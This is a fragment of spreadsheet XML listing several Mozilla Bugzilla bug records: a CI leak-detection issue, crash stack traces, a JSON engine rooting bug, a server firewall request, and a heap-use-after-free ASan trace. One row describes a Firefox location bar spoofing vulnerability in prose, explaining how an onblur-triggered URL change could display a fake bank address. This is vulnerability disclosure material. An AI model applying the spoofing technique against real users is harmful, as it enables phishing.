    <row r="2237">
      <c r="A2237" t="n">
        <v>455954</v>
      </c>
      <c r="B2237" t="inlineStr">
        <is>
          <t>2008-09-18 15:04:15 -0700</t>
        </is>
      </c>
      <c r="C2237" t="inlineStr">
        <is>
          <t>mozilla-central leak test machines do not go orange on non-zero RLk</t>
        </is>
      </c>
      <c r="D2237" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E2237" t="n">
        <v>1</v>
      </c>
      <c r="F2237" t="n">
        <v>1</v>
      </c>
      <c r="G2237" t="n">
        <v>5</v>
      </c>
      <c r="H2237" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2237" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2237" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2237" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2237" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2237" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2237" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2237" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2237" t="inlineStr"/>
      <c r="Q2237" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2237" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2237" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2237" t="n">
        <v>1</v>
      </c>
      <c r="U2237" t="n">
        <v>0</v>
      </c>
      <c r="V2237" t="n">
        <v>14</v>
      </c>
      <c r="W2237" t="inlineStr">
        <is>
          <t>sdwilsh checked in something that leaked today, but the non-zero RLk didn't make the machines orange. We had this on 1.9, and it hurts our ability to keep leaks from regressing.</t>
        </is>
      </c>
      <c r="X2237" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2238">
      <c r="A2238" t="n">
        <v>746517</v>
      </c>
      <c r="B2238" t="inlineStr">
        <is>
          <t>2012-04-18 03:11:52 -0700</t>
        </is>
      </c>
      <c r="C2238" t="inlineStr">
        <is>
          <t>android.view.ViewRootImpl$CalledFromWrongThreadException: Only the original thread that created a view hierarchy can touch its views at android.view.ViewRootImpl.checkThread(ViewRootImpl.java) at android.widget.ImageView.invalidateDrawable(ImageView.java)</t>
        </is>
      </c>
      <c r="D2238" t="inlineStr">
        <is>
          <t>2020-12-21 10:30:39 -0800</t>
        </is>
      </c>
      <c r="E2238" t="n">
        <v>1</v>
      </c>
      <c r="F2238" t="n">
        <v>1</v>
      </c>
      <c r="G2238" t="n">
        <v>6</v>
      </c>
      <c r="H2238" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2238" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J2238" t="inlineStr">
        <is>
          <t>Android Sync</t>
        </is>
      </c>
      <c r="K2238" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2238" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M2238" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N2238" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2238" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2238" t="inlineStr">
        <is>
          <t>[native-crash], sync</t>
        </is>
      </c>
      <c r="Q2238" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2238" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2238" t="inlineStr">
        <is>
          <t>mozilla14</t>
        </is>
      </c>
      <c r="T2238" t="n">
        <v>1</v>
      </c>
      <c r="U2238" t="n">
        <v>0</v>
      </c>
      <c r="V2238" t="n">
        <v>8</v>
      </c>
      <c r="W2238" t="inlineStr">
        <is>
          <t>There's one crash in 14.0a1/20120417: bp-ec504f72-1a32-4d13-b70a-dcca92120417.
android.view.ViewRootImpl$CalledFromWrongThreadException: Only the original thread that created a view hierarchy can touch its views.
	at android.view.ViewRootImpl.checkThread(ViewRootImpl.java:4039)
	at android.view.ViewRootImpl.invalidateChild(ViewRootImpl.java:722)
	at android.view.ViewRootImpl.invalidateChildInParent(ViewRootImpl.java:771)
	at android.view.ViewGroup.invalidateChild(ViewGroup.java:4005)
	at android.view.View.invalidate(View.java:8576)
	at android.view.View.invalidate(View.java:8527)
	at android.widget.ImageView.invalidateDrawable(ImageView.java:189)
	at android.graphics.drawable.Drawable.invalidateSelf(Drawable.java:350)
	at android.graphics.drawable.Drawable.setVisible(Drawable.java:548)
	at android.widget.ImageView.onDetachedFromWindow(ImageView.java:1060)
	at android.view.View.dispatchDetachedFromWindow(View.java:9818)
	at android.view.ViewGroup.dispatchDetachedFromWindow(ViewGroup.java:2266)
	at android.view.ViewGroup.dispatchDetachedFromWindow(ViewGroup.java:2266)
	at android.view.ViewGroup.removeAllViewsInLayout(ViewGroup.java:3717)
	at android.view.ViewGroup.removeAllViews(ViewGroup.java:3672)
	at com.android.internal.policy.impl.PhoneWindow.setContentView(PhoneWindow.java:249)
	at android.app.Activity.setContentView(Activity.java:1835)
	at org.mozilla.gecko.sync.setup.activities.SetupSyncActivity.displayAbort(SetupSyncActivity.java:253)
	at org.mozilla.gecko.sync.jpake.JPakeClient.displayAbort(JPakeClient.java:257)
	at org.mozilla.gecko.sync.jpake.JPakeClient.abort(JPakeClient.java:249)
	at org.mozilla.gecko.sync.jpake.stage.GetRequestStage$1.handleError(GetRequestStage.java:83)
	at org.mozilla.gecko.sync.jpake.stage.GetRequestStage$2.handleHttpIOException(GetRequestStage.java:164)
	at org.mozilla.gecko.sync.net.BaseResource.execute(BaseResource.java:257)
	at org.mozilla.gecko.sync.net.BaseResource.go(BaseResource.java:275)
	at org.mozilla.gecko.sync.net.BaseResource.get(BaseResource.java:281)
	at org.mozilla.gecko.sync.jpake.stage.GetRequestStage$GetStepTimerTask.run(GetRequestStage.java:194)
	at java.util.Timer$TimerImpl.run(Timer.java:284)
More reports at:
https://crash-stats.mozilla.com/report/list?signature=android.view.ViewRootImpl%24CalledFromWrongThreadException%3A+Only+the+original+thread+that+created+a+view+hierarchy+can+touch+its+views.+at+android.view.ViewRootImpl.checkThread%28ViewRootImpl.java%29</t>
        </is>
      </c>
      <c r="X2238" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2239">
      <c r="A2239" t="n">
        <v>1273537</v>
      </c>
      <c r="B2239" t="inlineStr">
        <is>
          <t>2016-05-17 08:23:29 -0700</t>
        </is>
      </c>
      <c r="C2239" t="inlineStr">
        <is>
          <t>A click into the location bar can lead to a Location Bar Spoofing vulnerability (URL and SSL Spoofing) using the onblur event and change the URL size by a bigger URL size.</t>
        </is>
      </c>
      <c r="D2239" t="inlineStr">
        <is>
          <t>2024-05-30 09:17:21 -0700</t>
        </is>
      </c>
      <c r="E2239" t="n">
        <v>1</v>
      </c>
      <c r="F2239" t="n">
        <v>1</v>
      </c>
      <c r="G2239" t="n">
        <v>2</v>
      </c>
      <c r="H2239" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2239" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2239" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K2239" t="inlineStr">
        <is>
          <t>46 Branch</t>
        </is>
      </c>
      <c r="L2239" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2239" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2239" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2239" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2239" t="inlineStr">
        <is>
          <t>[adv-main53+][adv-esr52.1+]</t>
        </is>
      </c>
      <c r="Q2239" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2239" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2239" t="inlineStr">
        <is>
          <t>Firefox 55</t>
        </is>
      </c>
      <c r="T2239" t="n">
        <v>1</v>
      </c>
      <c r="U2239" t="n">
        <v>0</v>
      </c>
      <c r="V2239" t="n">
        <v>60</v>
      </c>
      <c r="W2239" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0
Build ID: 20160502172042
Steps to reproduce:
(Only tested on Mac OS X).
A simple click on the location bar can lead to a Location Bar Spoofing (URL and SSL Spoofing).
Explication:
If an user click on the location bar and the ONBLUR event defines that the actual URL changes its size by a bigger size, (eg: http://www.yyy.com/ becomes http://www.yyy.com/#wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwhttps://www.bank.com/ ) , the end of the URL is shown instead of the start of this URL (so the location bar shows https://www.bank.com instead of http://www.yyy.com/# ).
-A demonstration video will be uploaded.
1) Open with Firefox "PoC v1 Part1.html" and click on the button "Step 1: ClickMe" 
(a popup window is opened)
2) Click on the location bar
Actual results:
The Location Bar is Spoofed and if the Malicious WebSite is secure , this leads to URL And SSL Spoofing
Expected results:
If an user click on the location bar and the ONBLUR event defines that the actual URL changes its size by a bigger size, the end of the URL is shown instead of the start of this URL.
Possible way to patch this vulnerability :
When an user click on the location bar , Firefox should continue to show the start of the visited URL instead of the end of this URL.</t>
        </is>
      </c>
      <c r="X2239" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2240">
      <c r="A2240" t="n">
        <v>561592</v>
      </c>
      <c r="B2240" t="inlineStr">
        <is>
          <t>2010-04-24 17:56:46 -0700</t>
        </is>
      </c>
      <c r="C2240" t="inlineStr">
        <is>
          <t>TM: rooting bug in json code</t>
        </is>
      </c>
      <c r="D2240" t="inlineStr">
        <is>
          <t>2010-06-22 19:50:50 -0700</t>
        </is>
      </c>
      <c r="E2240" t="n">
        <v>1</v>
      </c>
      <c r="F2240" t="n">
        <v>1</v>
      </c>
      <c r="G2240" t="n">
        <v>3</v>
      </c>
      <c r="H2240" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2240" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2240" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2240" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2240" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2240" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2240" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2240" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2240" t="inlineStr">
        <is>
          <t>[sg:critical] fixed-in-tracemonkey [qa-examined-192] [qa-noaction-192][qa-examined-191] [qa-noaction-191]</t>
        </is>
      </c>
      <c r="Q2240" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2240" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2240" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2240" t="n">
        <v>1</v>
      </c>
      <c r="U2240" t="n">
        <v>0</v>
      </c>
      <c r="V2240" t="n">
        <v>18</v>
      </c>
      <c r="W2240" t="inlineStr">
        <is>
          <t>#0  0x0000000104124fe3 in js_HasOwnProperty (cx=0x1053be800, lookup=0xdadadadadadadada, obj=0x106bb8480, id=4407833796, objp=0x7fff5fbfcd20, propp=0x7fff5fbfcd18) at ../../../js/src/jsobj.cpp:1588
#1  0x000000010413bff7 in JO (cx=0x1053be800, vp=0x7fff5fbfcf68, scx=0x7fff5fbfd430) at ../../../js/src/json.cpp:318
#2  0x000000010413b7cb in Str (cx=0x1053be800, id=4365160212, holder=0x106bb8440, scx=0x7fff5fbfd430, vp=0x7fff5fbfcf68, callReplacer=false) at ../../../js/src/json.cpp:506
#3  0x000000010413c2a7 in JO (cx=0x1053be800, vp=0x7fff5fbfd1e8, scx=0x7fff5fbfd430) at ../../../js/src/json.cpp:361
#4  0x000000010413b7cb in Str (cx=0x1053be800, id=4365160148, holder=0x106bb8400, scx=0x7fff5fbfd430, vp=0x7fff5fbfd1e8, callReplacer=false) at ../../../js/src/json.cpp:506
#5  0x000000010413c2a7 in JO (cx=0x1053be800, vp=0x1052b9908, scx=0x7fff5fbfd430) at ../../../js/src/json.cpp:361
#6  0x000000010413b7cb in Str (cx=0x1053be800, id=4398776324, holder=0x106bb8580, scx=0x7fff5fbfd430, vp=0x1052b9908, callReplacer=true) at ../../../js/src/json.cpp:506
#7  0x000000010413ba49 in js_Stringify (cx=0x1053be800, vp=0x1052b9908, replacer=0x0, space=0, cb=@0x7fff5fbfd510) at ../../../js/src/json.cpp:569
#8  0x0000000104077aff in JS_Stringify (cx=0x1053be800, vp=0x1052b9908, replacer=0x0, space=0, callback=0x100a52825 &lt;WriteCallback(unsigned short const*, unsigned int, void*)&gt;, data=0x7fff5fbfd670) at ../../../js/src/jsapi.cpp:5283
#9  0x0000000100a51a7f in nsJSON::EncodeInternal (this=0x104b91cd0, writer=0x7fff5fbfd670) at ../../../../dom/src/json/nsJSON.cpp:267
#10 0x0000000100a539c7 in nsJSON::Encode (this=0x104b91cd0, aJSON=@0x7fff5fbfdd50) at ../../../../dom/src/json/nsJSON.cpp:93
#11 0x00000001013b9055 in NS_InvokeByIndex_P (that=0x104b91cd0, methodIndex=3, paramCount=1, params=0x7fff5fbfd8f0) at ../../../../../../../xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:208
#12 0x00000001000e277f in XPCWrappedNative::CallMethod (ccx=@0x7fff5fbfded0, mode=XPCWrappedNative::CALL_METHOD) at ../../../../../js/src/xpconnect/src/xpcwrappednative.cpp:2750
#13 0x00000001000eabf1 in XPC_WN_CallMethod (cx=0x1053be800, obj=0x106ba0100, argc=1, argv=0x1052b9908, vp=0x7fff5fbfe070) at ../../../../../js/src/xpconnect/src/xpcwrappednativejsops.cpp:1770
#14 0x0000000104115834 in js_Invoke (cx=0x1053be800, argc=1, vp=0x1052b98f8, flags=2) at jsinterp.cpp:834
#15 0x0000000104100879 in js_Interpret (cx=0x1053be800) at jsops.cpp:2237
#16 0x0000000104114a88 in js_Execute () at jsinterp.cpp:1103
#17 0x000000010407a962 in JS_EvaluateUCScriptForPrincipals (cx=0x1053be800, obj=0x106b96840, principals=0x104a2c378, chars=0x106ce3f50, length=16, filename=0x1000126f3 "-e", lineno=1, rval=0x7fff5fbfec98) at ../../../js/src/jsapi.cpp:4862
#18 0x000000010407ac16 in JS_EvaluateScriptForPrincipals (cx=0x1053be800, obj=0x106b96840, principals=0x104a2c378, bytes=0x7fff5fbff3e1 "_execute_test();", nbytes=16, filename=0x1000126f3 "-e", lineno=1, rval=0x7fff5fbfec98) at ../../../js/src/jsapi.cpp:4826
#19 0x000000010000465b in ProcessArgs (cx=0x1053be800, obj=0x106b96840, argv=0x7fff5fbfef70, argc=16) at ../../../../../js/src/xpconnect/shell/xpcshell.cpp:1207
#20 0x00000001000051a1 in main (argc=16, argv=0x7fff5fbfef70, envp=0x7fff5fbfeff8) at ../../../../../js/src/xpconnect/shell/xpcshell.cpp:1885
548	js_Stringify(JSContext *cx, jsval *vp, JSObject *replacer, jsval space,
(gdb) 
549	             JSCharBuffer &amp;cb)
550	{
551	    // XXX stack
552	    JSObject *stack = JS_NewArrayObject(cx, 0, NULL);
553	    if (!stack)
554	        return JS_FALSE;
555	
556	    StringifyContext scx(cx, cb, replacer);
557	    if (!InitializeGap(cx, space, scx.gap))
558	        return JS_FALSE;
(gdb) 
559	
560	    JSObject *obj = NewObject(cx, &amp;js_ObjectClass, NULL, NULL);
561	    if (!obj)
562	        return JS_FALSE;
563	
564	    if (!obj-&gt;defineProperty(cx, ATOM_TO_JSID(cx-&gt;runtime-&gt;atomState.emptyAtom),
565	                             *vp, NULL, NULL, JSPROP_ENUMERATE)) {
566	        return JS_FALSE;
567	    }
568	
(gdb) 
569	    return Str(cx, ATOM_TO_JSID(cx-&gt;runtime-&gt;atomState.emptyAtom), obj, &amp;scx, vp);
570	}
several rooting issues in this function</t>
        </is>
      </c>
      <c r="X2240" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2241">
      <c r="A2241" t="n">
        <v>287661</v>
      </c>
      <c r="B2241" t="inlineStr">
        <is>
          <t>2005-03-25 00:20:35 -0800</t>
        </is>
      </c>
      <c r="C2241" t="inlineStr">
        <is>
          <t>NRPE and Firewall config changes needed for new nagios host at OSL</t>
        </is>
      </c>
      <c r="D2241" t="inlineStr">
        <is>
          <t>2015-03-12 08:17:16 -0700</t>
        </is>
      </c>
      <c r="E2241" t="n">
        <v>1</v>
      </c>
      <c r="F2241" t="n">
        <v>1</v>
      </c>
      <c r="G2241" t="n">
        <v>6</v>
      </c>
      <c r="H2241" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2241" t="inlineStr">
        <is>
          <t>mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J2241" t="inlineStr">
        <is>
          <t>Server Operations</t>
        </is>
      </c>
      <c r="K2241" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2241" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2241" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2241" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2241" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2241" t="inlineStr"/>
      <c r="Q2241" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2241" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2241" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2241" t="n">
        <v>1</v>
      </c>
      <c r="U2241" t="n">
        <v>0</v>
      </c>
      <c r="V2241" t="n">
        <v>4</v>
      </c>
      <c r="W2241" t="inlineStr">
        <is>
          <t>OSL is setting up a new nagios host specifically for OSL in place of the one for
all of OSU that they're currently using.
The NRPE clients and firewalls on all of our machines at OSL need to be
reconfigured to allow the new host to connect.
New IP address is 140.211.166.139</t>
        </is>
      </c>
      <c r="X2241" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2242">
      <c r="A2242" t="n">
        <v>999274</v>
      </c>
      <c r="B2242" t="inlineStr">
        <is>
          <t>2014-04-21 19:22:05 -0700</t>
        </is>
      </c>
      <c r="C2242" t="inlineStr">
        <is>
          <t>Heap-use-after-free in mozilla::dom::workers::WorkerPrivateParent</t>
        </is>
      </c>
      <c r="D2242" t="inlineStr">
        <is>
          <t>2024-05-30 08:34:02 -0700</t>
        </is>
      </c>
      <c r="E2242" t="n">
        <v>1</v>
      </c>
      <c r="F2242" t="n">
        <v>1</v>
      </c>
      <c r="G2242" t="n">
        <v>3</v>
      </c>
      <c r="H2242" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2242" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2242" t="inlineStr">
        <is>
          <t>DOM: Workers</t>
        </is>
      </c>
      <c r="K2242" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2242" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2242" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2242" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2242" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2242" t="inlineStr">
        <is>
          <t>[asan][adv-main30+][qa-]</t>
        </is>
      </c>
      <c r="Q2242" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2242" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2242" t="inlineStr">
        <is>
          <t>mozilla32</t>
        </is>
      </c>
      <c r="T2242" t="n">
        <v>1</v>
      </c>
      <c r="U2242" t="n">
        <v>0</v>
      </c>
      <c r="V2242" t="n">
        <v>18</v>
      </c>
      <c r="W2242" t="inlineStr">
        <is>
          <t>Created attachment 8409988
test.html
Please testcase in dom/workers/test/ directory. Install fuzzPriv to help in forcing memory pressure. Load testcase, wait a few secs (auto-reloads) and see the crash.
&gt;==15935==ERROR: AddressSanitizer: heap-use-after-free on address 0x61900092d448 at pc 0x7fee96b65ff9 bp 0x7fff3fbfda30 sp 0x7fff3fbfda28
&gt;READ of size 4 at 0x61900092d448 thread T0
&gt;    #0 0x7fee96b65ff8 in mozilla::dom::workers::WorkerPrivateParent&lt;mozilla::dom::workers::WorkerPrivate&gt;::WorkerScriptLoaded() dom/workers/WorkerPrivate.h:651
&gt;    #1 0x7fee96b34117 in (anonymous namespace)::ScriptLoaderRunnable::ExecuteFinishedScripts() dom/workers/ScriptLoader.cpp:560
&gt;    #2 0x7fee96b353d0 in nsRunnableMethodImpl&lt;void ((anonymous namespace)::ScriptLoaderRunnable::*)(), void, true&gt;::Run() objdir-ff-asan/dom/workers/../../dist/include/nsThreadUtils.h:387
&gt;    #3 0x7fee937b9020 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:699
&gt;    #4 0x7fee9367dfda in NS_ProcessNextEvent(nsIThread*, bool) xpcom/glue/nsThreadUtils.cpp:263
&gt;    #5 0x7fee93f8d909 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:95
&gt;    #6 0x7fee93f363b0 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:226
&gt;    #7 0x7fee961dca07 in nsBaseAppShell::Run() widget/xpwidgets/nsBaseAppShell.cpp:164
&gt;    #8 0x7fee99044638 in nsAppStartup::Run() toolkit/components/startup/nsAppStartup.cpp:277
&gt;    #9 0x7fee98eb63b3 in XREMain::XRE_mainRun() toolkit/xre/nsAppRunner.cpp:4019
&gt;    #10 0x7fee98eb729d in XREMain::XRE_main(int, char**, nsXREAppData const*) toolkit/xre/nsAppRunner.cpp:4088
&gt;    #11 0x7fee98eb80ed in XRE_main toolkit/xre/nsAppRunner.cpp:4300
&gt;    #12 0x48c6e7 in main browser/app/nsBrowserApp.cpp:282
&gt;    #13 0x7feea1f7276c in __libc_start_main /build/buildd/eglibc-2.15/csu/libc-start.c:226
&gt;    #14 0x48bbbc in _start
&gt;
&gt;0x61900092d448 is located 712 bytes inside of 1000-byte region [0x61900092d180,0x61900092d568)
&gt;freed by thread T78 (DOM Worker) here:
&gt;    #0 0x473b81 in __interceptor_free _asan_rtl_
&gt;    #1 0x7fee936cae0a in SnowWhiteKiller::~SnowWhiteKiller() xpcom/base/nsCycleCollector.cpp:2386
&gt;    #2 0x7fee936caa19 in nsCycleCollector::FreeSnowWhite(bool) xpcom/base/nsCycleCollector.cpp:2552
&gt;    #3 0x7fee936d07c2 in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) xpcom/base/nsCycleCollector.cpp:3428
&gt;    #4 0x7fee936cfee6 in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*) xpcom/base/nsCycleCollector.cpp:3290
&gt;    #5 0x7fee936d3a43 in nsCycleCollector_collect(nsICycleCollectorListener*) xpcom/base/nsCycleCollector.cpp:3843
&gt;    #6 0x7fee936c0fed in mozilla::CycleCollectedJSRuntime::OnGC(JSGCStatus) xpcom/base/CycleCollectedJSRuntime.cpp:1164
&gt;    #7 0x7fee9a97dae3 in Collect(JSRuntime*, bool, long, js::JSGCInvocationKind, JS::gcreason::Reason) js/src/jsgc.cpp:4960
&gt;    #8 0x7fee9a898f66 in js::DestroyContext(JSContext*, js::DestroyContextMode) js/src/jscntxt.cpp:264
&gt;    #9 0x7fee96b2b676 in (anonymous namespace)::WorkerThreadPrimaryRunnable::Run() dom/workers/RuntimeService.cpp:2574
&gt;    #10 0x7fee937b9020 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:699
&gt;    #11 0x7fee9367dfda in NS_ProcessNextEvent(nsIThread*, bool) xpcom/glue/nsThreadUtils.cpp:263
&gt;    #12 0x7fee93f8e836 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:336
&gt;    #13 0x7fee93f363b0 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:226
&gt;    #14 0x7fee937b5e05 in nsThread::ThreadFunc(void*) xpcom/threads/nsThread.cpp:311
&gt;    #15 0x7fee9fa19d95 in _pt_root nsprpub/pr/src/pthreads/ptthread.c:212
&gt;    #16 0x7feea2f36e99 in start_thread /build/buildd/eglibc-2.15/nptl/pthread_create.c:308
&gt;
&gt;previously allocated by thread T78 (DOM Worker) here:
&gt;    #0 0x473d81 in malloc _asan_rtl_
&gt;    #1 0x7fee9e0e9a4d in moz_xmalloc memory/mozalloc/mozalloc.cpp:52
&gt;    #2 0x7fee96b473d6 in mozilla::dom::workers::WorkerPrivate::Constructor(mozilla::dom::GlobalObject const&amp;, nsAString_internal const&amp;, bool, mozilla::dom::workers::WorkerPrivateParent&lt;mozilla::dom::workers::WorkerPrivate&gt;::WorkerType, nsACString_internal const&amp;, mozilla::dom::workers::WorkerPrivateParent&lt;mozilla::dom::workers::WorkerPrivate&gt;::LoadInfo*, mozilla::ErrorResult&amp;) objdir-ff-asan/dom/workers/../../dist/include/mozilla/mozalloc.h:201
&gt;    #3 0x7fee96b470a2 in mozilla::dom::workers::WorkerPrivate::Constructor(mozilla::dom::GlobalObject const&amp;, nsAString_internal const&amp;, mozilla::ErrorResult&amp;) dom/workers/WorkerPrivate.cpp:3588
&gt;    #4 0x7fee95ecb0d0 in mozilla::dom::WorkerBinding::_constructor(JSContext*, unsigned int, JS::Value*) objdir-ff-asan/dom/bindings/./WorkerBinding.cpp:669
&gt;    #5 0x7fee9ac761ed in js::InvokeConstructor(JSContext*, JS::CallArgs) js/src/jscntxtinlines.h:239
&gt;    #6 0x7fee9ac67ffe in Interpret(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:2618
&gt;    #7 0x7fee9ac4b539 in js::RunScript(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:421
&gt;    #8 0x7fee9ac74bc5 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/vm/Interpreter.cpp:493
&gt;    #9 0x7fee9ac75c6e in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value const*, JS::MutableHandle&lt;JS::Value&gt;) js/src/vm/Interpreter.cpp:530
&gt;    #10 0x7fee9a8c3f2f in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) js/src/jsapi.cpp:5056
&gt;    #11 0x7fee9541f001 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;) objdir-ff-asan/dom/bindings/./EventHandlerBinding.cpp:35
&gt;    #12 0x7fee9686c88f in JS::Value mozilla::dom::EventHandlerNonNull::Call&lt;nsISupports*&gt;(nsISupports* const&amp;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;, mozilla::dom::CallbackObject::ExceptionHandling) objdir-ff-asan/dom/events/../../dist/include/mozilla/dom/EventHandlerBinding.h:62
&gt;    #13 0x7fee9686adaf in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) dom/events/JSEventHandler.cpp:205
&gt;    #14 0x7fee9683ada0 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) dom/events/EventListenerManager.cpp:950
&gt;    #15 0x7fee9683c1e0 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) dom/events/EventListenerManager.cpp:1011
&gt;    #16 0x7fee9682cbf1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) dom/events/EventDispatcher.cpp:287
&gt;    #17 0x7fee96830d16 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsCOMArray&lt;mozilla::dom::EventTarget&gt;*) dom/events/EventDispatcher.cpp:597
&gt;    #18 0x7fee967f6fc5 in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) dom/events/EventDispatcher.cpp:661
&gt;    #19 0x7fee96b70fe5 in (anonymous namespace)::MessageEventRunnable::DispatchDOMEvent(JSContext*, mozilla::dom::workers::WorkerPrivate*, mozilla::DOMEventTargetHelper*, bool) dom/workers/WorkerPrivate.cpp:1010
